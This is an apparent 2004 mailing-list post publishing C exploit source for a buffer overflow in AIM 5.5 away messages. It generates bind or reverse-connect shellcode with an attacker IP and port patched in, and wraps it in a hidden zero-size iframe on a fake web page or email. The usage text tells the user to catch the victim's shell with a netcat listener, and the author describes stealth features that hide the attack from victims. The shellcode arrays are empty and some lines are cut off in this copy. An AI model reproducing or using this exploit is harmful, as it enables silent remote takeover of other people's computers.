Exploit: AIM Exploit (Ignore Previous Post)
- Subject: Exploit: AIM Exploit (Ignore Previous Post)
- Date: 1 Sep 2004 13:22:57 -0000
Hi people, sorry I'm posting this again but I made a slight error in the code
on submission. The error was in the reverse_shellcode return address which I
just edited to be more universal using a universal AOL module return address...
/* Begin Exploit Code */
* AIM Away Message Buffer Overflow Exploit
* Exploit by John Bissell A.K.A. HighT1mes
* Exploit:
* ========
* drizzit.c
* Vulnerable Software:
* ====================
* - AIM 5.5.3588
* - AIM 5.5.3590 Beta
* - AIM 5.5.3591
* - AIM 5.5.3595
* and a couple others versions...
* If you want to try other return addressees for other versions of
* AIM then edit the return address.. But the current one embedded
* will work for sure with all the AIM versions listed above.
* I used some of the metasploit shellcode for this exploit with some
* modifications to get this into stealth mode so it is harder to
* detect the attack. Since I'm using metasploit shellcode that means this
* exploit can be used on any NT type OS, like win2k, winnt, winxp across
* any service pack.. I don't know about SP2 though I haven't tested
* it yet.
* On a side note I pourposly did not include the download+exec shellcode
* even though I have it because I'm sick and tired of these little
* spam/adware bitchs messing peoples computers up for profit.. You can
* still download/upload through the shell to the victim. It just
* isn't automated like download+exec would be.
* In my opinion the reverse connect (-r option) is the most dangerous
* because you can encode your ip address and pick a port, and then
* when the victim visits the evil web page or email whatever.. then the
* attack will automatically open his AIM even its not already open and
* connect to you and then terminate the AIM process to be stealth so
* the victim doesn't know what him them.. As I remind people in the
* exploit usage you need to remember to use netcat to listen on a
* port you picked for the exploit to connect to...
* One reason I decided to include the generation of html code for
* this exploit is I noticed almost no puts small limits on the
* <IFRAME SRC=""> attribute. So when the victim connects to that
* page or reads that email depending on the browser or client,
* The exploit will execute.. IE 6.0 and Mozilla are
* affected by this problem as well as Outlook Express when the
* security settings are set to the Internet Zone.
* Excuse the sloppy commandline interface I just wanted to get
* this out to the public.
* [ Original advisory posted by Secunia and iDEFENSE. ]
* Greets:
* =======
* IsolationX, YpCat, DaPhire, route, #romhack,
* Taylor Hayes, Aria Giovanni, Anthony Rocha,
* InVerse, Deltaflame, Jenna Jameson, iDENFENSE,
* secunia, so1o, John Kerry, and many others...
* Compiler:
* =========
* Visual C++ 6.0
* To compile you first must add ws2_32.lib to the Object/librarys modules:
* text box under the Project -> Settings menu; then click on the link tab...
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
/* Exploit Data */
char injection_vector[] =
char bind_shellcode[] =
char reverse_shellcode[] =
/* Function Prototypes */
void print_usage(char *prog_name);
unsigned char xor_data(unsigned char byte);
/* Function Code */
int main(int argc, char *argv[])
int i = 0;
int raw_num = 0;
unsigned long port = 1337; /* default port for bind and
reverse attacks */
unsigned long encoded_port = 0;
unsigned long encoded_ip = 0;
unsigned char print_raw_exploit = 0;
unsigned char attack_mode = 2; /* bind attack by default */
char ip_addr[256];
char exploit[2048];
char str_num[16];
char *p1, *p2;
char outfile[512];
if (argc < 2) print_usage(argv[0]);
/* process commandline */
for (i = 0; i < argc; i++) {
if (argv[i][0] == '-') {
switch (argv[i][1]) {
case 'r':
/* reverse connect */
strncpy(ip_addr, argv[i+1], 20);
attack_mode = 1;
case 'b':
/* bind */
attack_mode = 2;
case 'p':
port = atoi(argv[i+1]);
/* port */
case 'o':
print_raw_exploit = 1;
case 'e':
strncpy(outfile, argv[i+1], 256);
/* initialize the socket library */
if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {
printf("Error: Winsock didn't initialize!\n");
/* build exploit */
strncpy(exploit, injection_vector, strlen(injection_vector));
exploit[strlen(injection_vector)+1]=0; // tack on NULL byte
encoded_port = htonl(port);
encoded_port += 2;
if (attack_mode == 1) {
/* reverse connect attack */
reverse_shellcode[196] = (char) 0x90;
reverse_shellcode[197] = (char) 0x92;
reverse_shellcode[198] = xor_data((char)((encoded_port >> 16) &
reverse_shellcode[199] = xor_data((char)((encoded_port >> 24) &
p1 = strchr(ip_addr, '.');
strncpy(str_num, ip_addr, p1-ip_addr);
raw_num = atoi(str_num);
reverse_shellcode[191] = xor_data((char)raw_num);
p2 = strchr(p1+1, '.');
strncpy(str_num, ip_addr+(p1-ip_addr)+1, p2-p1);
raw_num = atoi(str_num);
reverse_shellcode[192] = xor_data((char)raw_num);
p1 = strchr(p2+1, '.');
strncpy(str_num, ip_addr+(p2-ip_addr)+1, p1-p2);
raw_num = atoi(str_num);
reverse_shellcode[193] = xor_data((char)raw_num);
p2 = strrchr(ip_addr, '.');
strncpy(str_num, p2+1, 5);
raw_num = atoi(str_num);
reverse_shellcode[194] = xor_data((char)raw_num);
strncat(exploit, reverse_shellcode, sizeof(reverse_shellcode));
if (attack_mode == 2) {
/* bind attack */
bind_shellcode[204] = (char) 0x90;
bind_shellcode[205] = (char) 0x92;
bind_shellcode[206] = xor_data((char)((encoded_port >> 16) &
bind_shellcode[207] = xor_data((char)((encoded_port >> 24) &
strncat(exploit, bind_shellcode, sizeof(bind_shellcode));
/* output exploit */
if (print_raw_exploit == 1) {
printf("%s", exploit);
else {
if ((EXPLOIT_FP = fopen(outfile, "w")) == NULL) {
fprintf(stderr, "Error: Exploit file can't be
fprintf(EXPLOIT_FP, "<html>\n");
fprintf(EXPLOIT_FP, "<head>\n");
fprintf(EXPLOIT_FP, "<title>Hey d00d!</title>\n");
fprintf(EXPLOIT_FP, "</head>\n");
fprintf(EXPLOIT_FP, "<body>\n");
fprintf(EXPLOIT_FP, "Some fake web page or email...\n");
fprintf(EXPLOIT_FP, "<iframe width=0 height=0 border=0 src=\"");
fprintf(EXPLOIT_FP, "%s", exploit);
fprintf(EXPLOIT_FP, "\">\n</iframe>\n");
fprintf(EXPLOIT_FP, "</body>\n");
fprintf(EXPLOIT_FP, "<html>\n");
/* im to lazy to make a macro for this banner :P */
printf(" | AIM Exploit by John Bissell A.K.A. HighT1mes
printf(" | AIM Away Message Buffer Overflow Exploit
printf(" Exploit created!\n\n");
printf(" Remember if you use the -r option to have netcat
printf(" on the port you are using for the attack so the victim
printf(" be able to connect to you when exploited...\n\n");
printf(" Example:\n");
printf("\tnc.exe -l -p %d", port);
void print_usage(char *prog_name)
printf(" +-------------------------------------------------+\n");
printf(" | AIM Exploit by John Bissell A.K.A. HighT1mes |\n");
printf(" | AIM Away Message Buffer Overflow Exploit |\n");
printf(" +-------------------------------------------------+\n\n");
printf(" Exploit Usage:\n");
printf("\t%s -r your_ip | -b [-p port] -o | -e outfile\n\n", prog_name);
printf(" Parameters:\n");
printf("\t-r your_ip or -b\t Choose -r for reverse connect attack\
mode\n\t\t\t\t and choose -b for a bind attack. By default\n\t\t\t\t if you
don't specify -r or\
-b then a bind\n\t\t\t\t attack will be generated.\n\n");
printf("\t-p (optional)\t\t This option will allow you to change the
\n\t\t\t\t used for a bind or reverse connect attack.\n\t\t\t\t If the attack
mode is bind then\
the\n\t\t\t\t victim will open the -p port. If the attack\n\t\t\t\t mode is
reverse connect\
then the port you\n\t\t\t\t specify will be the one you want to
listen\n\t\t\t\t on so the victim can\
connect to you\n\t\t\t\t right away.\n\n");
printf("\t-o or -e outfile\t\t Here you specify the output
method...\n\t\t\t\t If you would like\
output go straight to\n\t\t\t\t standerd output then specify the -o
option\n\t\t\t\t otherwise give the\
path of where you want to\n\t\t\t\t create the exploit file which is
basically\n\t\t\t\t a simple html\
file. The -o option is useful if\n\t\t\t\t you want to test the exploit url
in\n\t\t\t\t different ways.\n\n");
printf(" Examples:\n");
printf("\t%s -r -p 8888 -e c:\\exploit.html\n", prog_name);
printf("\t%s -b -p 1542 -e c:\\new_exploit.html\n", prog_name);
printf("\t%s -b -o\n", prog_name);
printf("\t%s -r -o\n\n", prog_name);
printf(" Remember if you use the -r option to have netcat listening\n");
printf(" on the port you are using for the attack so the victim
printf(" be able to connect to you when exploited...\n\n");
printf(" Example:\n");
printf("\tnc.exe -l -p 8888");
unsigned char xor_data(unsigned char byte)
return(byte ^ 0x92);